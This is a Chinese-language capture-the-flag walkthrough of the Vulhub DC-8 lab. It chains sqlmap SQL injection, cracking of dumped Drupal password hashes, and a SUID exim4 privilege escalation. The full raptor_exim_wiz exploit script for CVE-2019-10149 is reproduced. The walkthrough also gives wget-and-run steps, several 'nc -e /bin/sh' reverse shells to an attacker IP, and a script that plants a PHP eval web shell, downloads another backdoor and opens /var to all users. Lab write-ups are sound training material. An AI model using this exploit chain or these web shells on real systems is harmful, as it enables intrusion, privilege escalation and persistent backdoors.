Vulhub-DC-8靶场实战攻略

测试网页中的Details 发现可以通过Get传参数  加上单引号以后出现报错 说明存在SQL注入的漏洞  通过sqlmap进行尝试

 

sqlmap -u http://192.168.206.142/?nid=1 -D d7db --tables

sqlmap -u http://192.168.206.142/?nid=1 -D d7db -T users --columns

sqlmap -u http://192.168.206.142/?nid=1 -D d7db -T users -C name,pass --dump

name   | pass                                                    |
+--------+---------------------------------------------------------+
| admin  | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john   | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |

通过工具John对其进行破解

根据对Drupal的熟悉  后台的登录位置默认在 /user/login

john

turtle

192.168.206.142/user/login

 

python -c 'import pty;pty.spawn("/bin/bash")'
find / -user root -perm -4000 -print 2>/dev/null

有一个exim4

/usr/sbin/exim4 --version

searchsploit exim

cp /usr/share/exploitdb/exploits/linux/local/46996.sh /home/kali/46996.sh

cat /home/kali/46996.sh

内容如下

#!/bin/bash

#
# raptor_exim_wiz - "The Return of the WIZard" LPE exploit
# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# A flaw was found in Exim versions 4.87 to 4.91 (inclusive).
# Improper validation of recipient address in deliver_message()
# function in /src/deliver.c may lead to remote command execution.
# (CVE-2019-10149)
#
# This is a local privilege escalation exploit for "The Return
# of the WIZard" vulnerability reported by the Qualys Security
# Advisory team.
#
# Credits:
# Qualys Security Advisory team (kudos for your amazing research!)
# Dennis 'dhn' Herrmann (/dev/tcp technique)
#
# Usage (setuid method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m setuid
# Preparing setuid shell helper...
# Delivering setuid payload...
# [...]
# Waiting 5 seconds...
# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
# Usage (netcat method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m netcat
# Delivering netcat payload...
# Waiting 5 seconds...
# localhost [127.0.0.1] 31337 (?) open
# id
# uid=0(root) gid=0(root) groups=0(root)
#
# Vulnerable platforms:
# Exim 4.87 - 4.91
#
# Tested against:
# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]
#

METHOD="setuid" # default method
PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost'

# usage instructions
function usage()
{
    echo "$0 [-m METHOD]"
    echo
    echo "-m setuid : use the setuid payload (default)"
    echo "-m netcat : use the netcat payload"
    echo
    exit 1
}

# payload delivery
function exploit()
{
    # connect to localhost:25
    exec 3<>/dev/tcp/localhost/25

    # deliver the payload
    read -u 3 && echo $REPLY
    echo "helo localhost" >&3
    read -u 3 && echo $REPLY
    echo "mail from:<>" >&3
    read -u 3 && echo $REPLY
    echo "rcpt to:<$PAYLOAD>" >&3
    read -u 3 && echo $REPLY
    echo "data" >&3
    read -u 3 && echo $REPLY
    for i in {1..31}
    do
        echo "Received: $i" >&3
    done
    echo "." >&3
    read -u 3 && echo $REPLY
    echo "quit" >&3
    read -u 3 && echo $REPLY
}

# print banner
echo
echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
echo 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>'
echo

# parse command line
while [ ! -z "$1" ]; do
    case $1 in
        -m) shift; METHOD="$1"; shift;;
        * ) usage
        ;;
    esac
done
if [ -z $METHOD ]; then
    usage
fi

# setuid method
if [ $METHOD = "setuid" ]; then

    # prepare a setuid shell helper to circumvent bash checks
    echo "Preparing setuid shell helper..."
    echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c
    gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null
    if [ $? -ne 0 ]; then
        echo "Problems compiling setuid shell helper, check your gcc."
        echo "Falling back to the /bin/sh method."
        cp /bin/sh /tmp/pwned
    fi
    echo

    # select and deliver the payload
    echo "Delivering $METHOD payload..."
    PAYLOAD=$PAYLOAD_SETUID
    exploit
    echo

    # wait for the magic to happen and spawn our shell
    echo "Waiting 5 seconds..."
    sleep 5
    ls -l /tmp/pwned
    /tmp/pwned

# netcat method
elif [ $METHOD = "netcat" ]; then

    # select and deliver the payload
    echo "Delivering $METHOD payload..."
    PAYLOAD=$PAYLOAD_NETCAT
    exploit
    echo

    # wait for the magic to happen and spawn our shell
    echo "Waiting 5 seconds..."
    sleep 5
    nc -v 127.0.0.1 31337

# print help
else
    usage
fi

由于后期避免出现字符编码问题  本次对这个sh文件用vi编辑

编辑的结尾加上

:set ff=unix

之后再次进入 输入

:set ff?

出现fileformat=unix 才行

之后正常如下操作即可

python -m SimpleHTTPServer

之后在靶机中

cd /tmp

wget http://192.168.206.128:8000/46996.sh

chmod 777 46996.sh

./46996.sh -m netcat

nc -e /bin/sh 192.168.206.128 10010

---

---

Getfile.sh

#!/bin/bash
cd /var/www/html/
touch muma2.php
echo '<?php eval($_POST[1]);?>' >> /var/www/html/muma2.php

nc -e /bin/sh 192.168.206.128 10010

nc -e /bin/sh 192.168.206.128 10010
wget http://192.168.206.128:8000/miansha.php
chmod 777 ./miansha.php
chmod -R 777 /var/*